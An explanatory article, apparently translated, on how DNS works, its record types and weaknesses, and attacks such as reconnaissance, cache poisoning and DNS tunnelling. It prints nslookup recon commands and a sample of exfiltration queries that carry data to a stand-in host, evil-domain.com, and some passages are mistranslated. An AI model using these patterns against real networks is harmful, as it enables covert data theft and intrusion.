Table of contents of the article:
The Domain Name System (DNS) is a fundamental component of the modern network that translates between human-readable domain names and the underlying Internet Protocol (IP) addresses that connected devices use to communicate with each other. DNS predates the World Wide Web and facilitates virtually all communications on the Internet, as well as other uses that could not even be imagined when it was developed in the early 80s. However, the lack of security features in this long-lived network protocol has led to numerous vulnerabilities and attacks. In this article, we will answer questions like "What is DNS?", "How does DNS work?" and "What are the different types of DNS records?"
What is DNS?
DNS is often referred to as the Internet version of the Yellow Pages . In the old days, when you needed to find a business address, you looked for it in the Yellow Pages. DNS is just like that, except you don't actually have to search for anything - your internet-connected computer does it for you. This is how your computer knows how to find Google , ESPN.com or Managedserver.it.
For two computers to communicate over an IP network, the protocol dictates that they need an IP address. Think of an IP address as a street address: for one computer to "locate" another, they need to know the other computer's number. Since most people are better at remembering names - www.google.it - that the numbers - 184.108.40.206, needed a computer program to translate the names into IP addresses.
DNS is most often thought of in the context of the World Wide Web, but in truth there is a DNS lookup behind almost every type of network request, even those not initiated by a user. Software updates, social media apps, and even malware generally reach a host name rather than an IP address. This way, if the underlying IP address changes, connectivity can still be established.
How DNS works
DNS is such an integral part of the internet that it's important to understand how it works.
Think of DNS as an address book, but instead of mapping people's names to their addresses, the address book maps computer names to IP addresses. Each mapping is called a "DNS record". DNS clients on connected devices reach DNS servers to retrieve these records. Different types of records are used for different purposes. Web browsers rely on a type "A" record, while the "MX" record indicates the direction to a mail server. Here's how you can host a website with one service provider and an email service at another.
Here is a look at the "A" record for varonis.com as seen by a popular command line utility called DiG:
As you can see in the example, it is possible to have multiple records for a single host name or domain. This can be used to provide redundancy and load balancing.
The internet has a lot of computers, so there's no point in putting all these records into one big book. Instead, the DNS is organized into smaller books or domains. Domains can be very large, so they are further organized into smaller books, called "zones". No single DNS server stores all the books - that would be impractical.
Instead, DNS operates in a distributed fashion, with millions of servers around the world working together. When your computer wants to perform a DNS lookup, it may ask the DNS server on your local router. The local router will in turn make an “upstream” query to another DNS server, often provided by an Internet Service Provider. Queries for a domain can go “upstream” until they reach the authority of the domain or “authoritative name server”. In practice, the results are often "cached" at lower levels to avoid having to run the entire process for each query.
An authoritative name server is where administrators manage the server names and IP addresses for their domains. Whenever a DNS administrator wants to add, change, or delete a server name or IP address, they make a change to their authoritative DNS server (sometimes called the “primary DNS server”). There are also “slave” DNS servers; these DNS servers keep copies of the DNS records for their zones and domains.
DNS queries, servers and record types
The basic concepts behind DNS are relatively simple, but over the years the technical side of things has become increasingly complex. Here is a look at some of the internal mechanics of the system:
What are the types of DNS queries?
A DNS query is the message sent by a client to a DNS server or between two DNS servers. A DNS query can be one of the following:
- Recursive DNS query
In a recursive DNS query, a DNS client will reach a server, which in turn will make upstream requests for the domain in question until a result is found. The only rule set for a recursive query is that a result must be returned, if there is one. There can be one or dozens of recursions. The initial server or even the local DNS client might have a cached result already. A time-to-live (TTL) value determines how long one of these results can be cached; once the TTL is reached, the client or server will have to look up the results upstream.
- Iterative DNS query
Unlike recursive DNS queries, iterative DNS queries do not travel upstream. Instead, the DNS server the client is addressing will do its best to answer the query. If not, it might suggest a different DNS server such as authoritative name server or TLD name server. The requester will continue this iterative process until it finds an answer or expires.
What are the types of DNS servers?
As already stated, DNS is a distributed system, which means that servers around the world work together to maintain and deliver DNS records. Different types of servers have different roles within the overall system:
- Recursive DNS
Sometimes called a recursive resolver, a DNS recursor receives queries from DNS clients, responds if a hit is available in the cache, or reaches a name server higher in the chain. Appeals are often handled by ISPs, but it's easy to change a computer's DNS configuration to point to another source for performance, security, or privacy reasons.
- DNS Root Server
As the name suggests, root servers are the foundation from which the entire DNS infrastructure is built. Root servers act as authoritative name servers for top level domains (TLDs) such as “.com” and “.net”. There is a problem, however, because the root servers themselves are referred to by host names within those same TLDs. If a DNS client can't determine which name server to turn to for “.net”, how can it possibly resolve a fully qualified domain like “a.root-servers.net”? The answer is that DNS clients and lower level servers are "bootstrapped" with a list of thirteen IP addresses of the main server. These addresses don't tend to change often and only one of them needs to be reachable to fix the others.
- TLD name server
TLD name servers are second in importance only to root servers, as they know where to go to get answers on any domain within a given TLD. When looking for www.managedserver.it , a TLD server for ".com" will respond first, pointing the client at the name server with the records for "managedserver". part of the domain name.
- Authoritative Nameserver
The authoritative name server is the last stop for a DNS query. This server, or often server for redundancy reasons, is the highest authority for a given domain. However, not all DNS queries reach the authoritative name server, as there may be cached results closer to the initial request.
Organizations often use DNS internally as well. The operation is not much different, except that DNS lookups and records remain within the corporate network rather than the Internet. This is known as "private" or "local" DNS as opposed to the public DNS service.
What are the types of DNS records?
DNS records come in a wide variety of types, each used for different purposes. Here are some of the most common:
- Record "A" - Classic use of DNS, translates a domain into an IPv4 address.
- “AAAA” Record - Same functionality as an “A” record, but using an IPv6 address instead of IPv4.
- Record "MX" - Abbreviation for "Mail Exchange", identifies the e-mail server associated with the domain.
- “TXT” Record: Used for a wide variety of purposes, from proof of domain ownership to cryptographic email signing to fight spam.
Advantages and weaknesses of DNS
There are many good reasons why we are still using DNS after all these years. Some of the advantages of the system include:
- It is distributed and resilient
There weren't many domains in use during the early days of the internet, so it's conceivable that we could have ended up with a single central database with all domain-to-IP mappings. This, of course, would not have allowed the scalability needed to power the modern Internet. The distributed nature of DNS also means that the system is resilient; a power outage, a cut fiber cable, or a cyber attack on a DNS server will not interrupt the system as a whole.
- It is versatile and extensible
DNS developers have always wanted the protocol to be extensible as technology progressed. Extensions to the original DNS standard brought new features and functionality while maintaining backward compatibility. Over the years, new record types, improved rules for DNS packet delivery, and improved security have been added.
- It is an open and well documented standard
DNS was not born out of a particular provider's dominance or a desire to gain market share. The Internet Engineering Task Force (IETF) openly publishes the set of rules that make up the protocol, allowing any software developer to implement DNS in their products. There are many different DNS client and server implementations, but because they conform to a common standard, they can all work together.
Weaknesses and Vulnerabilities
The first iterations of the Domain Name System (DNS) date back to the early 80s, well before the emergence of modern cybersecurity threats. As a result, DNS and many other older protocols still in use today, such as ARP and IMCP, never included much in the way of security features. In the years since, a number of extensions and mitigations have been devised as new threats have emerged, but DNS is still often abused by attackers.
From a threat actor's point of view, there are several characteristics that make DNS attractive:
- Every network uses it
DNS is ubiquitous. Almost every computer network in the world will see thousands or millions of DNS queries every single day. While not technically necessary for an IP network to work, blocking or throttling DNS simply isn't practical, so nearly every firewall on the planet is configured to allow outbound traffic on port 53. This means attackers don't just have a almost guaranteed way out of a compromised network, but there's also a lot of legitimate traffic they can merge with.
- There is no authentication
Like many other early network protocols, DNS never included an authentication mechanism. This means that in the main DNS protocol it is not possible to be sure that a certain result is authentic. Attackers took advantage of this with a whole range of opportunities for spoofing and poisoning attacks that target everything from individual machines to vast swathes of the entire internet.
Lack of DNS authentication became headline news in 2008 when security researcher Dan Kaminsky discovered a huge vulnerability that could have allowed attackers to poison the cache of almost any DNS server in use at the time. . The result was that even with very little technical skill, an attacker could trick legitimate DNS servers into sending bogus IP information for important domains like a bank or government institution.
Faced with the threat of bogus DNS records wreaking havoc in the internet community, service providers and standardization bodies have teamed up to adopt something called Domain Name System Security Extensions (DNSSEC). DNSSEC uses public key cryptography to digitally sign DNS results, ensuring that the response to a query is truly authentic.
- There is no encryption either
DNS queries and their responses are sent in the clear, which means anyone on the network can view them with a tool like Wireshark . This presents potential privacy concerns because it means your co-workers, your boss, or even your ISP can tell which domains you interacted with. This is also true for websites that take advantage of SSL / TLS encryption; the actual data transferred between the site and your computer may not be viewable, but that initial DNS query that gave you the site's IP address in the first place is.
Two concurrent approaches have been advanced to wrap DNS traffic with a layer of encryption as it passes through a network: DNS over HTTPS (DoH) and DNS over TLS. Which approach to use - and whether DNS should also be encrypted in the first place - is subject of heated debates .
Types of DNS attacks
DNS reconnaissance attacks
DNS is all about information, which from an attacker's perspective can be a valuable tool. DNS queries can be used to map a victim's network infrastructure by revealing live host on a network , discovering the hostnames of high-value targets such as mail servers and files, and providing clues to applications and services in use. You can perform your local DNS recon mission simply by following the instructions below:
If you have a Windows computer, run the following commands as they are; if you are a Linux user, there are corresponding commands you can search for.
- Open a command prompt (type Ctrl + esc, the letters “cmd”, then enter).
- Type ipconfig
- You'll see the DNS domain you're in (connection-specific DNS suffix), your IP address, and a bunch of other things. You will want to refer to this.
- Type nslookup [IP address] You will see the DNS server name that is responding and, if the name is known, the DNS record that lists the name and IP address.
- nslookup –type = soa [your domain] This command returns your authoritative DNS server, it wouldn't be useful if you were trying to infiltrate a network.
- nslookup –type = MX [your domain] That command returns all mail servers on your local domain, in case you want to hack mail servers and don't know where they are.
As we have already learned, most networks have a lot of DNS queries going on all the time. For many standard security products and network monitoring solutions, the queries used by an attacker to enumerate a network do not look much different than all other legitimate queries.
DNS hijacking to redirect traffic
The lack of authentication in the original DNS protocol gives attackers a huge advantage because it means that queries and responses can be manipulated or spoofed in many different places from the local machine to the global DNS resolvers.
A classic local network attack involves chaining ARP spoofing with an unauthorized DNS server. If successful, this will cause other machines on the network to funnel their DNS queries to a server controlled by the attacker. The attacker can then return their IP addresses for those queries instead of the legitimate address. Without the mitigations in place, a user could type in a domain like example.com, see a page load, and never have any indication that he was actually communicating with a malicious fake.
Attackers can also use a variety of techniques for poison the cache of legitimate DNS servers . This typically occurs when organizations run their own local DNS recursor; a successful cache poisoning attack on a large public DNS provider could have a global impact, so these providers tend to be very security conscious. However, even the big providers they are not immune to vulnerabilities .
If an attacker successfully spoofs a DNS response, it can make the receiving DNS server's cache a poisoned record. So how does it help the attackers?
Here's an example: Let's say an attacker learns that your organization is using an external application for something important, like spending. If they poison your organization's DNS server so that it sends every user to the attacker's server, all they have to do is create a legitimate-looking login page and the users will enter their credentials. They could even forward traffic to the real server (acting like a "man in the middle"), so no one notices. The attacker can then try those credentials on other systems, sell them, or just celebrate with a wicked laugh.
Using DNS as a covert channel
Since outgoing DNS traffic is hardly ever blocked, and tends to be a lot, using DNS for data exfiltration or secret communications has become a favorite tactic of many sophisticated adversaries. The attackers' goal is to merge with all that legitimate network traffic through a called technique DNS Tunneling . In some cases, an attacker will simply use the DNS protocol in ways not intended for data transfer. This can be risky, however, as it could generate large spikes or unusual traffic patterns that a well-prepared organization can quickly notice.
A more sophisticated approach involves misusing the DNS infrastructure itself. The attacker will set up a DNS domain (evil-domain.com, for example) on the Internet and create an authoritative name server. Then, on the compromised host, the attacker can use a program that splits the data into small chunks and inserts them into a series of searches, like so:
- nslookup My1secret1.evil-domain.com
- nslookup is1that1I1know.evil-domain.com
- nslookup how2steal1data.evil-domain.com
The corp.com DNS server will receive these requests, realize that the results are not in its cache, and will relay those requests back to the authoritative name server of evil-domain.com. The attacker expects this traffic, then runs a program on the authoritative name server to extract the first part of the query (all before evil-domain.com) and reassemble it. Unless your organization is inspecting queries made by DNS servers, they may never realize that their DNS servers were used to exfiltrate data.
And even more types of attacks!
The above list is by no means a complete list of all possible DNS attacks. Protocol has been abused for everything from DDoS campaigns al covert monitoring of Internet users . Attackers have recently been observed modify the DNS configuration in different varieties of home routers to spread malware . Both malicious actors and security researchers are constantly on the lookout for new vulnerabilities, and their attention is unlikely to shift anytime soon.
DNS has been around for a long time, and every computer connected to the Internet relies on it. Attackers now use DNS for both external and internal reconnaissance, to hijack traffic and create secret communication channels. Fortunately, monitoring DNS servers e applying security analysis , many of these attacks can be detected and prevented.